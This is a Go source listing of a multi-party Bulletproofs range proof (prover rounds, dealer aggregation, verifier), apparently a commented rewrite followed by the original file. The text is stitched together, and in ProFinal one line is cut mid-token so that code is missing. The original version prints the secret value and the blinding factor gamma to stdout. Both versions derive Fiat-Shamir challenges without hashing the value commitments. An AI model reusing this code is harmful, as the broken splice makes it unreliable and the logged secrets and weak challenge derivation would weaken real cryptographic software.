	Comm ECPoint
	A    ECPoint
	S    ECPoint
}

// T1T2Commitment is a party's second-round message (commitments to t1 and t2).
type T1T2Commitment struct {
	T1 ECPoint
	T2 ECPoint
}

// OtherShare is a party's final-round share sent to the dealer.
type OtherShare struct {
	Left  []*big.Int // this party's slice of l(x)
	Right []*big.Int // this party's slice of r(x)
	That  *big.Int   // <Left, Right>
	Taux  *big.Int   // blinding share for t-hat
	Mu    *big.Int   // blinding share alpha + rho*x
}
// AandS runs the first prover round for party `id`: it produces the Pedersen
// commitment to v, the commitment A to the bit vectors aL/aR of v, and the
// commitment S to fresh random blinding vectors sL/sR. All private witnesses
// are recorded in prip for the later rounds. Panics when v lies outside
// [0, 2^(EC.V/m)).
//
// Fixes vs. the original: the RNG error is checked *before* gamma is used,
// and the debug prints of the secret value v and blinding gamma are removed
// (they leaked secrets to stdout).
func AandS(v *big.Int, id, m int, prip *PrivateParams, EC CryptoParams) ASCommitment {
	AS := ASCommitment{}
	bitsPerValue := EC.V / m // bits proven per party (cryptoparams.go sets V = n * m)
	if v.Cmp(big.NewInt(0)) == -1 {
		panic("Value is below range! Not proving")
	}
	if v.Cmp(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(bitsPerValue)), EC.N)) == 1 {
		panic("Value is above range! Not proving.")
	}
	prip.Id = id
	prip.V = v
	// Pedersen commitment Comm = v*G + gamma*H with fresh blinding gamma.
	gamma, err := rand.Int(rand.Reader, EC.N)
	check(err)
	prip.Gamma = gamma
	comm := EC.G.Mult(v, EC).Add(EC.H.Mult(gamma, EC), EC)
	AS.Comm = comm
	// aL is the (reversed, zero-padded) bit vector of v; aR = aL - 1^n.
	aL := reverse(StrToBigIntArray(PadLeft(fmt.Sprintf("%b", v), "0", bitsPerValue)))
	prip.AL = aL
	aR := VectorAddScalar(aL, big.NewInt(-1), EC)
	prip.AR = aR
	alpha, err := rand.Int(rand.Reader, EC.N)
	check(err)
	prip.Alpha = alpha
	// Each party commits against its own slice of the shared generator vectors.
	BPG := EC.BPG[id*bitsPerValue : (id+1)*bitsPerValue]
	BPH := EC.BPH[id*bitsPerValue : (id+1)*bitsPerValue]
	A := TwoVectorPCommitWithGens(BPG, BPH, aL, aR, EC).Add(EC.H.Mult(alpha, EC), EC)
	AS.A = A
	sL := RandVector(bitsPerValue, EC)
	sR := RandVector(bitsPerValue, EC)
	prip.SL = sL
	prip.SR = sR
	rho, err := rand.Int(rand.Reader, EC.N)
	check(err)
	prip.Rho = rho
	S := TwoVectorPCommitWithGens(BPG, BPH, sL, sR, EC).Add(EC.H.Mult(rho, EC), EC)
	AS.S = S
	return AS
}
// Fait_y_z aggregates the per-party A and S commitments and derives the
// Fiat-Shamir challenges y and z from their hashes, recording the sums and
// challenges in mpcrp before returning (cy, cz).
func Fait_y_z(A, S []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) (*big.Int, *big.Int) {
	sumA := EC.Zero()
	sumS := EC.Zero()
	for i := range A {
		sumA = sumA.Add(A[i], EC)
		sumS = sumS.Add(S[i], EC)
	}
	mpcrp.A = sumA
	mpcrp.S = sumS
	// y = H(sum A), z = H(sum S), each interpreted as a big integer.
	hashA := sha256.Sum256([]byte(sumA.X.String() + sumA.Y.String()))
	cy := new(big.Int).SetBytes(hashA[:])
	mpcrp.Cy = cy
	hashS := sha256.Sum256([]byte(sumS.X.String() + sumS.Y.String()))
	cz := new(big.Int).SetBytes(hashS[:])
	mpcrp.Cz = cz
	return cy, cz
}
/*
DeltaMPC is a helper function that is used in the range proof
\DeltaMPC(y, z) = (z-z^2)<1^n, y^n> - z^3 * z^j * <1^n, 2^n>
*/
func DeltaMPC(y []*big.Int, z *big.Int, id, m int, EC CryptoParams) *big.Int {
	mod := EC.N
	// First term: (z - z^2) * <1^n, y^n>
	zSquared := new(big.Int).Mod(new(big.Int).Mul(z, z), mod)
	zMinusZ2 := new(big.Int).Mod(new(big.Int).Sub(z, zSquared), mod)
	firstTerm := new(big.Int).Mod(new(big.Int).Mul(zMinusZ2, VectorSum(y, EC)), mod)
	// Second term: z^(3+id) * <1^n, 2^n>, where <1^n, 2^n> = 2^n - 1
	zPow := new(big.Int).Exp(z, big.NewInt(3+int64(id)), mod)
	twoPowSum := new(big.Int).Sub(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(EC.V/m)), mod), big.NewInt(1))
	secondTerm := new(big.Int).Mod(new(big.Int).Mul(zPow, twoPowSum), mod)
	return new(big.Int).Mod(new(big.Int).Sub(firstTerm, secondTerm), mod)
}
// T1andT2 runs the second prover round for party `id`: given the challenges
// cy and cz, it computes this party's coefficients t0, t1, t2 of the
// polynomial t(X) = <l(X), r(X)>, stores them (with fresh blindings tau1,
// tau2) in prip, and returns Pedersen commitments T1, T2 to t1 and t2.
func T1andT2(v *big.Int, id, m int, cy, cz *big.Int, prip *PrivateParams, EC CryptoParams) T1T2Commitment {
	t1t2 := T1T2Commitment{}
	// aL aR sL sR — witnesses saved during the first round (AandS)
	aL := prip.AL
	aR := prip.AR
	sL := prip.SL
	sR := prip.SR
	bitsPerValue := EC.V / m
	// PowerOfTwos
	PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
	PowerOfCY := PowerVector(EC.V, cy, EC) // EC.V = n * m
	// zPowersTimesTwoVec[j*n+i] = z^(2+j) * 2^i, laid out party-by-party.
	zPowersTimesTwoVec := make([]*big.Int, EC.V)
	for j := 0; j < m; j++ {
		zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
		for i := 0; i < bitsPerValue; i++ {
			zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
		}
	}
	// This party's slices of y^n and z^(2+j)*2^n.
	yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
	z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
	// l(X) = l0 + l1*X and r(X) = r0 + r1*X:
	l0 := VectorAddScalar(aL, new(big.Int).Neg(cz), EC)
	l1 := sL
	r0 := VectorAdd(
		VectorHadamard(
			yn,
			VectorAddScalar(aR, cz, EC), EC),
		z2j2n, EC)
	r1 := VectorHadamard(sR, yn, EC)
	//calculate t0
	z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
	PowerOfCZ := PowerVector(m, cz, EC)
	vz2 := new(big.Int).Mul(PowerOfCZ[id], new(big.Int).Mul(v, z2))
	vz2 = new(big.Int).Mod(vz2, EC.N)
	t0 := new(big.Int).Mod(new(big.Int).Add(vz2, DeltaMPC(yn, cz, id, m, EC)), EC.N)
	// t1 = <l1, r0> + <l0, r1>; t2 = <l1, r1>
	t1 := new(big.Int).Mod(new(big.Int).Add(InnerProduct(l1, r0, EC), InnerProduct(l0, r1, EC)), EC.N)
	t2 := InnerProduct(l1, r1, EC)
	prip.Tt0 = t0
	prip.Tt1 = t1
	prip.Tt2 = t2

	// given the t_i values, we can generate commitments to them
	tau1, err := rand.Int(rand.Reader, EC.N)
	check(err)
	tau2, err := rand.Int(rand.Reader, EC.N)
	check(err)
	prip.Tau1 = tau1
	prip.Tau2 = tau2
	T1 := EC.G.Mult(t1, EC).Add(EC.H.Mult(tau1, EC), EC) //commitment to t1
	T2 := EC.G.Mult(t2, EC).Add(EC.H.Mult(tau2, EC), EC) //commitment to t2
	t1t2.T1 = T1
	t1t2.T2 = T2
	return t1t2
}
// Fait_x aggregates the per-party T1 and T2 commitments and derives the
// Fiat-Shamir challenge x from their combined hash, recording the sums and
// the challenge in mpcrp before returning cx.
func Fait_x(T1, T2 []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) *big.Int {
	sumT1 := EC.Zero()
	sumT2 := EC.Zero()
	for i := range T1 {
		sumT1 = sumT1.Add(T1[i], EC)
		sumT2 = sumT2.Add(T2[i], EC)
	}
	mpcrp.T1 = sumT1
	mpcrp.T2 = sumT2
	// x = H(sum T1 || sum T2), interpreted as a big integer.
	digest := sha256.Sum256([]byte(sumT1.X.String() + sumT1.Y.String() + sumT2.X.String() + sumT2.Y.String()))
	cx := new(big.Int).SetBytes(digest[:])
	mpcrp.Cx = cx
	return cx
}
// ProFinal runs the final prover round for party `id`: it evaluates the
// vector polynomials l(x) and r(x) at the challenge cx, computes
// t-hat = <l, r>, the blinding taux, and mu, and returns them as the
// party's share for the dealer. A consistency check warns when <l, r>
// disagrees with t0 + t1*x + t2*x^2.
//
// Fix vs. the original: the debug print of gamma is removed — gamma is the
// secret blinding of the value commitment and must not be logged.
func ProFinal(v *big.Int, id, m int, cy, cz, cx *big.Int, prip *PrivateParams, EC CryptoParams) OtherShare {
	share := OtherShare{}
	// aL aR sL sR — witnesses saved during the first round (AandS)
	aL := prip.AL
	aR := prip.AR
	sL := prip.SL
	sR := prip.SR
	// Rebuild the same y/z power vectors used in T1andT2.
	bitsPerValue := EC.V / m
	PowerOfCY := PowerVector(EC.V, cy, EC)
	PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
	zPowersTimesTwoVec := make([]*big.Int, EC.V)
	for j := 0; j < m; j++ {
		zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
		for i := 0; i < bitsPerValue; i++ {
			zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
		}
	}
	yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
	z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
	// l = l(x), r = r(x) for this party's slice.
	left := CalculateLMRP(aL, sL, cz, cx, EC)
	right := CalculateRMRP(aR, sR, yn, z2j2n, cz, cx, EC)
	share.Left = left
	share.Right = right
	// t0 t1 t2
	t0 := prip.Tt0
	t1 := prip.Tt1
	t2 := prip.Tt2
	thatPrime := new(big.Int).Mod( // t0 + t1*x + t2*x^2
		new(big.Int).Add(t0, new(big.Int).Add(new(big.Int).Mul(t1, cx), new(big.Int).Mul(new(big.Int).Mul(cx, cx), t2))), EC.N)
	that := InnerProduct(left, right, EC) // NOTE: BP Java implementation calculates this from the t_i
	// thatPrime and that should be equal
	if thatPrime.Cmp(that) != 0 {
		fmt.Println("Proving -- Uh oh! Two diff ways to compute same value not working")
		fmt.Printf("\tthatPrime = %s\n", thatPrime.String())
		fmt.Printf("\tthat = %s \n", that.String())
	}
	share.That = that
	// tau1, tau2, gamma rho — blindings saved in the earlier rounds.
	tau1 := prip.Tau1
	tau2 := prip.Tau2
	gamma := prip.Gamma
	rho := prip.Rho
	alpha := prip.Alpha
	// taux = tau2*x^2 + tau1*x + z^(2+id)*gamma
	taux1 := new(big.Int).Mod(new(big.Int).Mul(tau2, new(big.Int).Mul(cx, cx)), EC.N)
	taux2 := new(big.Int).Mod(new(big.Int).Mul(tau1, cx), EC.N)
	z2j := new(big.Int).Exp(cz, big.NewInt(2+int64(id)), EC.N)
	tmp1 := new(big.Int).Mul(gamma, z2j)
	taux := new(big.Int).Mod(new(big.Int).Add(taux1, new(big.Int).Add(taux2, tmp1)), EC.N)
	// mu = alpha + rho*x
	mu := new(big.Int).Mod(new(big.Int).Add(alpha, new(big.Int).Mul(rho, cx)), EC.N)
	share.Taux = taux
	share.Mu = mu
	return share
}
// DealerFinal aggregates the parties' final shares (combined l/r vectors and
// the scalar shares t-hat, taux, mu), records the sums in mpcrp, and
// produces the inner-product argument over the combined vectors with
// respect to the y-adjusted generators H'.
func DealerFinal(left, right []*big.Int, tx, rx, mu []*big.Int, m int, mpcrp *MPCRangeProof, cy *big.Int, EC CryptoParams) {
	countThat := big.NewInt(0)
	countTaux := big.NewInt(0)
	countMu := big.NewInt(0)
	countLeft := left
	countRight := right
	bitsPerValue := EC.V / m
	// Sum every party's scalar shares.
	for j := 0; j < len(tx); j++ {
		countThat = new(big.Int).Add(countThat, tx[j])
		countTaux = new(big.Int).Add(countTaux, rx[j])
		countMu = new(big.Int).Add(countMu, mu[j])
	}
	mpcrp.Tau = countTaux
	mpcrp.Th = countThat
	mpcrp.Mu = countMu
	// H'[k] = H[k] * y^{-k}: same basis switch MPCVerify applies, so the
	// inner-product argument can be run directly on <l, r>.
	HPrime := make([]ECPoint, len(EC.BPH))
	PowerOfCY := PowerVector(EC.V, cy, EC)
	for j := 0; j < m; j++ {
		for i := 0; i < bitsPerValue; i++ {
			HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowerOfCY[j*bitsPerValue+i], EC.N), EC)
		}
	}
	P := TwoVectorPCommitWithGens(EC.BPG, HPrime, countLeft, countRight, EC)
	that := InnerProduct(countLeft, countRight, EC)
	IPP := InnerProductProve(countLeft, countRight, that, P, EC.U, EC.BPG, HPrime, EC)
	mpcrp.IPP = IPP
}
// MPCVerify checks an aggregated MPC range proof: it re-derives the three
// Fiat-Shamir challenges from the recorded commitments, checks the t-hat
// commitment equation, and finally verifies the inner-product argument.
// Returns true only when all checks pass.
func MPCVerify(mrp *MPCRangeProof, EC CryptoParams) bool {
	m := len(mrp.Comms)
	bitsPerValue := EC.V / m
	//changes:
	// check 1 changes since it includes all commitments
	// check 2 commitment generation is also different
	// Re-derive the challenges exactly as Fait_y_z / Fait_x computed them
	// and compare to the values stored in the proof.
	chal1s256 := sha256.Sum256([]byte(mrp.A.X.String() + mrp.A.Y.String()))
	cy := new(big.Int).SetBytes(chal1s256[:])
	if cy.Cmp(mrp.Cy) != 0 {
		fmt.Println("MPCVerify - Challenge Cy failing!")
		return false
	}
	chal2s256 := sha256.Sum256([]byte(mrp.S.X.String() + mrp.S.Y.String()))
	cz := new(big.Int).SetBytes(chal2s256[:])
	if cz.Cmp(mrp.Cz) != 0 {
		fmt.Println("MPCVerify - Challenge Cz failing!")
		return false
	}
	chal3s256 := sha256.Sum256([]byte(mrp.T1.X.String() + mrp.T1.Y.String() + mrp.T2.X.String() + mrp.T2.Y.String()))
	cx := new(big.Int).SetBytes(chal3s256[:])
	if cx.Cmp(mrp.Cx) != 0 {
		fmt.Println("MPCVerify - Challenge Cx failing!")
		return false
	}
	// given challenges are correct, verify the range proof
	PowersOfY := PowerVector(EC.V, cy, EC)
	// t_hat * G + tau * H
	lhs := EC.G.Mult(mrp.Th, EC).Add(EC.H.Mult(mrp.Tau, EC), EC)
	// z^2 * \bold{z}^m \bold{V} + delta(y,z) * G + x * T1 + x^2 * T2
	CommPowers := EC.Zero()
	PowersOfZ := PowerVector(m, cz, EC)
	z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
	for j := 0; j < m; j++ {
		CommPowers = CommPowers.Add(mrp.Comms[j].Mult(new(big.Int).Mul(z2, PowersOfZ[j]), EC), EC)
	}
	rhs := EC.G.Mult(DeltaMRP(PowersOfY, cz, m, EC), EC).Add(
		mrp.T1.Mult(cx, EC), EC).Add(
		mrp.T2.Mult(new(big.Int).Mul(cx, cx), EC), EC).Add(CommPowers, EC)
	if !lhs.Equal(rhs) {
		fmt.Println("MPCVerify - Uh oh! Check line (63) of verification")
		fmt.Println(rhs)
		fmt.Println(lhs)
		return false
	}
	// tmp1 = -z * sum(G[i]): the constant -z shift applied to every G generator.
	tmp1 := EC.Zero()
	zneg := new(big.Int).Mod(new(big.Int).Neg(cz), EC.N)
	for i := range EC.BPG {
		tmp1 = tmp1.Add(EC.BPG[i].Mult(zneg, EC), EC)
	}
	PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
	tmp2 := EC.Zero()
	// generate h' (H'[k] = H[k] * y^{-k}, matching the prover side)
	HPrime := make([]ECPoint, len(EC.BPH))
	for j := 0; j < m; j++ {
		for i := 0; i < bitsPerValue; i++ {
			HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowersOfY[j*bitsPerValue+i], EC.N), EC)
		}
	}
	// tmp2 = sum over all positions of (z*y^k + z^(2+j)*2^i) * H'[k].
	for j := 0; j < m; j++ {
		for i := 0; i < bitsPerValue; i++ {
			val1 := new(big.Int).Mul(cz, PowersOfY[j*bitsPerValue+i])
			zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
			val2 := new(big.Int).Mod(new(big.Int).Mul(zp, PowerOfTwos[i]), EC.N)
			tmp2 = tmp2.Add(HPrime[j*bitsPerValue+i].Mult(new(big.Int).Add(val1, val2), EC), EC)
		}
	}
	// without subtracting this value should equal muCH + l[i]G[i] + r[i]H'[i]
	// we want to make sure that the innerproduct checks out, so we subtract it
	P := mrp.A.Add(mrp.S.Mult(cx, EC), EC).Add(tmp1, EC).Add(tmp2, EC).Add(EC.H.Mult(mrp.Mu, EC).Neg(EC), EC)
	//fmt.Println(P)
	if !InnerProductVerifyFast(mrp.Th, P, EC.U, EC.BPG, HPrime, mrp.IPP, EC) {
		fmt.Println("MPCVerify - Uh oh! Check line (65) of verification!")
		return false
	}
	return true
}
mpc_range_proof.go | package mbp
import (
"crypto/rand"
"crypto/sha256"
"fmt"
"math/big"
)
// MPCRangeProof is a struct of secure multi-party computation range proof
type MPCRangeProof struct {
Comms []ECPoint
A ECPoint
S ECPoint
T1 ECPoint
T2 ECPoint
Tau *big.Int
Th *big.Int
Mu *big.Int
IPP InnerProdArg
// challenges
Cy *big.Int
Cz *big.Int
Cx *big.Int
}
// PrivateParams is the private params of Prover
type PrivateParams struct {
Id int
V *big.Int
AL []*big.Int
AR []*big.Int
SL []*big.Int
SR []*big.Int
Gamma *big.Int
Alpha *big.Int
Rho *big.Int
Tt0 *big.Int
Tt1 *big.Int
Tt2 *big.Int
Tau1 *big.Int
Tau2 *big.Int
}
type InitParams struct {
//EC CryptoParams
N int
M int
}
type ASCommitment struct {
Comm ECPoint
A ECPoint
S ECPoint
}
type T1T2Commitment struct {
T1 ECPoint
T2 ECPoint
}
type OtherShare struct {
Left []*big.Int
Right []*big.Int
That *big.Int
Taux *big.Int
Mu *big.Int
}
func AandS(v *big.Int, id, m int, prip *PrivateParams, EC CryptoParams) ASCommitment {
AS := ASCommitment{}
fmt.Printf("v: %v\n", v)
bitsPerValue := EC.V / m //
if v.Cmp(big.NewInt(0)) == -1 {
panic("Value is below range! Not proving")
}
if v.Cmp(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(bitsPerValue)), EC.N)) == 1 {
panic("Value is above range! Not proving.")
}
prip.Id = id
prip.V = v
gamma, err := rand.Int(rand.Reader, EC.N)
prip.Gamma = gamma
fmt.Printf("gamma: %v\n", gamma)
check(err)
comm := EC.G.Mult(v, EC).Add(EC.H.Mult(gamma, EC), EC)
AS.Comm = comm
aL := reverse(StrToBigIntArray(PadLeft(fmt.Sprintf("%b", v), "0", bitsPerValue)))
prip.AL = aL
aR := VectorAddScalar(aL, big.NewInt(-1), EC)
prip.AR = aR
alpha, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Alpha = alpha
// 设置cryptoparams.go中 v = n * m
BPG := EC.BPG[id*bitsPerValue : (id+1)*bitsPerValue]
BPH := EC.BPH[id*bitsPerValue : (id+1)*bitsPerValue]
A := TwoVectorPCommitWithGens(BPG, BPH, aL, aR, EC).Add(EC.H.Mult(alpha, EC), EC)
AS.A = A
sL := RandVector(bitsPerValue, EC)
sR := RandVector(bitsPerValue, EC)
prip.SL = sL
prip.SR = sR
rho, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Rho = rho
S := TwoVectorPCommitWithGens(BPG, BPH, sL, sR, EC).Add(EC.H.Mult(rho, EC), EC)
AS.S = S
return AS
}
func Fait_y_z(A, S []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) (*big.Int, *big.Int) {
countA := EC.Zero()
countS := EC.Zero()
for i := 0; i < len(A); i++ {
// 是代码中定义的加 代码定义
countA = countA.Add(A[i], EC)
countS = countS.Add(S[i], EC)
}
mpcrp.A = countA
mpcrp.S = countS
chal1s256 := sha256.Sum256([]byte(countA.X.String() + countA.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
mpcrp.Cy = cy
chal2s256 := sha256.Sum256([]byte(countS.X.String() + countS.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
mpcrp.Cz = cz
return cy, cz
}
/*
DeltaMPC is a helper function that is used in the range proof
\DeltaMPC(y, z) = (z-z^2)<1^n, y^n> - z^3 * z^j * <1^n, 2^n>
*/
func DeltaMPC(y []*big.Int, z *big.Int, id, m int, EC CryptoParams) *big.Int {
result := big.NewInt(0)
// (z-z^2)<1^n, y^n>
z2 := new(big.Int).Mod(new(big.Int).Mul(z, z), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Sub(z, z2), EC.N)
t2 := new(big.Int).Mod(new(big.Int).Mul(t1, VectorSum(y, EC)), EC.N)
// z^(3+j)<1^n, 2^n>
z3j := new(big.Int).Exp(z, big.NewInt(3+int64(id)), EC.N)
po2sum := new(big.Int).Sub(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(EC.V/m)), EC.N), big.NewInt(1))
t3 := new(big.Int).Mod(new(big.Int).Mul(z3j, po2sum), EC.N)
result = new(big.Int).Mod(new(big.Int).Sub(t2, t3), EC.N)
return result
}
func T1andT2(v *big.Int, id, m int, cy, cz *big.Int, prip *PrivateParams, EC CryptoParams) T1T2Commitment {
t1t2 := T1T2Commitment{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
bitsPerValue := EC.V / m
// PowerOfTwos
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
PowerOfCY := PowerVector(EC.V, cy, EC) // EC.V = n * m
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
l0 := VectorAddScalar(aL, new(big.Int).Neg(cz), EC)
l1 := sL
r0 := VectorAdd(
VectorHadamard(
yn,
VectorAddScalar(aR, cz, EC), EC),
z2j2n, EC)
r1 := VectorHadamard(sR, yn, EC)
//calculate t0
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
PowerOfCZ := PowerVector(m, cz, EC)
vz2 := new(big.Int).Mul(PowerOfCZ[id], new(big.Int).Mul(v, z2))
vz2 = new(big.Int).Mod(vz2, EC.N)
t0 := new(big.Int).Mod(new(big.Int).Add(vz2, DeltaMPC(yn, cz, id, m, EC)), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Add(InnerProduct(l1, r0, EC), InnerProduct(l0, r1, EC)), EC.N)
t2 := InnerProduct(l1, r1, EC)
prip.Tt0 = t0
prip.Tt1 = t1
prip.Tt2 = t2
// given the t_i values, we can generate commitments to them
tau1, err := rand.Int(rand.Reader, EC.N)
check(err)
tau2, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Tau1 = tau1
prip.Tau2 = tau2
T1 := EC.G.Mult(t1, EC).Add(EC.H.Mult(tau1, EC), EC) //commitment to t1
T2 := EC.G.Mult(t2, EC).Add(EC.H.Mult(tau2, EC), EC) //commitment to t2
t1t2.T1 = T1
t1t2.T2 = T2
return t1t2
}
func Fait_x(T1, T2 []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) *big.Int {
countT1 := EC.Zero()
countT2 := EC.Zero()
for i := 0; i < len(T1); i++ {
countT1 = countT1.Add(T1[i], EC)
countT2 = countT2.Add(T2[i], EC)
}
mpcrp.T1 = countT1
mpcrp.T2 = countT2
chal3s256 := sha256.Sum256([]byte(countT1.X.String() + countT1.Y.String() + countT2.X.String() + countT2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
mpcrp.Cx = cx
return cx
}
func ProFinal(v *big.Int, id, m int, cy, cz, cx *big.Int, prip *PrivateParams, EC CryptoParams) OtherShare {
share := OtherShare{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
// PowerOfCY PowerOfTwos zPowersTimesTwoVec
bitsPerValue := EC.V / m
PowerOfCY := PowerVector(EC.V, cy, EC)
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bit | tsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
left := CalculateLMRP(aL, sL, cz, cx, EC)
right := CalculateRMRP(aR, sR, yn, z2j2n, cz, cx, EC)
share.Left = left
share.Right = right
// t0 t1 t2
t0 := prip.Tt0
t1 := prip.Tt1
t2 := prip.Tt2
thatPrime := new(big.Int).Mod( // t0 + t1*x + t2*x^2
new(big.Int).Add(t0, new(big.Int).Add(new(big.Int).Mul(t1, cx), new(big.Int).Mul(new(big.Int).Mul(cx, cx), t2))), EC.N)
that := InnerProduct(left, right, EC) // NOTE: BP Java implementation calculates this from the t_i
// thatPrime and that should be equal
if thatPrime.Cmp(that) != 0 {
fmt.Println("Proving -- Uh oh! Two diff ways to compute same value not working")
fmt.Printf("\tthatPrime = %s\n", thatPrime.String())
fmt.Printf("\tthat = %s \n", that.String())
}
share.That = that
// tau1, tau2, gamma rho
tau1 := prip.Tau1
tau2 := prip.Tau2
gamma := prip.Gamma
rho := prip.Rho
alpha := prip.Alpha
fmt.Printf("gamma: %v\n", gamma)
taux1 := new(big.Int).Mod(new(big.Int).Mul(tau2, new(big.Int).Mul(cx, cx)), EC.N)
taux2 := new(big.Int).Mod(new(big.Int).Mul(tau1, cx), EC.N)
z2j := new(big.Int).Exp(cz, big.NewInt(2+int64(id)), EC.N)
tmp1 := new(big.Int).Mul(gamma, z2j)
taux := new(big.Int).Mod(new(big.Int).Add(taux1, new(big.Int).Add(taux2, tmp1)), EC.N)
mu := new(big.Int).Mod(new(big.Int).Add(alpha, new(big.Int).Mul(rho, cx)), EC.N)
share.Taux = taux
share.Mu = mu
return share
}
func DealerFinal(left, right []*big.Int, tx, rx, mu []*big.Int, m int, mpcrp *MPCRangeProof, cy *big.Int, EC CryptoParams) {
countThat := big.NewInt(0)
countTaux := big.NewInt(0)
countMu := big.NewInt(0)
countLeft := left
countRight := right
bitsPerValue := EC.V / m
for j := 0; j < len(tx); j++ {
countThat = new(big.Int).Add(countThat, tx[j])
countTaux = new(big.Int).Add(countTaux, rx[j])
countMu = new(big.Int).Add(countMu, mu[j])
}
mpcrp.Tau = countTaux
mpcrp.Th = countThat
mpcrp.Mu = countMu
HPrime := make([]ECPoint, len(EC.BPH))
PowerOfCY := PowerVector(EC.V, cy, EC)
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowerOfCY[j*bitsPerValue+i], EC.N), EC)
}
}
P := TwoVectorPCommitWithGens(EC.BPG, HPrime, countLeft, countRight, EC)
that := InnerProduct(countLeft, countRight, EC)
IPP := InnerProductProve(countLeft, countRight, that, P, EC.U, EC.BPG, HPrime, EC)
mpcrp.IPP = IPP
}
func MPCVerify(mrp *MPCRangeProof, EC CryptoParams) bool {
m := len(mrp.Comms)
bitsPerValue := EC.V / m
//changes:
// check 1 changes since it includes all commitments
// check 2 commitment generation is also different
// verify the challenges
chal1s256 := sha256.Sum256([]byte(mrp.A.X.String() + mrp.A.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
if cy.Cmp(mrp.Cy) != 0 {
fmt.Println("MPCVerify - Challenge Cy failing!")
return false
}
chal2s256 := sha256.Sum256([]byte(mrp.S.X.String() + mrp.S.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
if cz.Cmp(mrp.Cz) != 0 {
fmt.Println("MPCVerify - Challenge Cz failing!")
return false
}
chal3s256 := sha256.Sum256([]byte(mrp.T1.X.String() + mrp.T1.Y.String() + mrp.T2.X.String() + mrp.T2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
if cx.Cmp(mrp.Cx) != 0 {
fmt.Println("MPCVerify - Challenge Cx failing!")
return false
}
// given challenges are correct, very range proof
PowersOfY := PowerVector(EC.V, cy, EC)
// t_hat * G + tau * H
lhs := EC.G.Mult(mrp.Th, EC).Add(EC.H.Mult(mrp.Tau, EC), EC)
// z^2 * \bold{z}^m \bold{V} + delta(y,z) * G + x * T1 + x^2 * T2
CommPowers := EC.Zero()
PowersOfZ := PowerVector(m, cz, EC)
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
for j := 0; j < m; j++ {
CommPowers = CommPowers.Add(mrp.Comms[j].Mult(new(big.Int).Mul(z2, PowersOfZ[j]), EC), EC)
}
rhs := EC.G.Mult(DeltaMRP(PowersOfY, cz, m, EC), EC).Add(
mrp.T1.Mult(cx, EC), EC).Add(
mrp.T2.Mult(new(big.Int).Mul(cx, cx), EC), EC).Add(CommPowers, EC)
if !lhs.Equal(rhs) {
fmt.Println("MPCVerify - Uh oh! Check line (63) of verification")
fmt.Println(rhs)
fmt.Println(lhs)
return false
}
tmp1 := EC.Zero()
zneg := new(big.Int).Mod(new(big.Int).Neg(cz), EC.N)
for i := range EC.BPG {
tmp1 = tmp1.Add(EC.BPG[i].Mult(zneg, EC), EC)
}
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
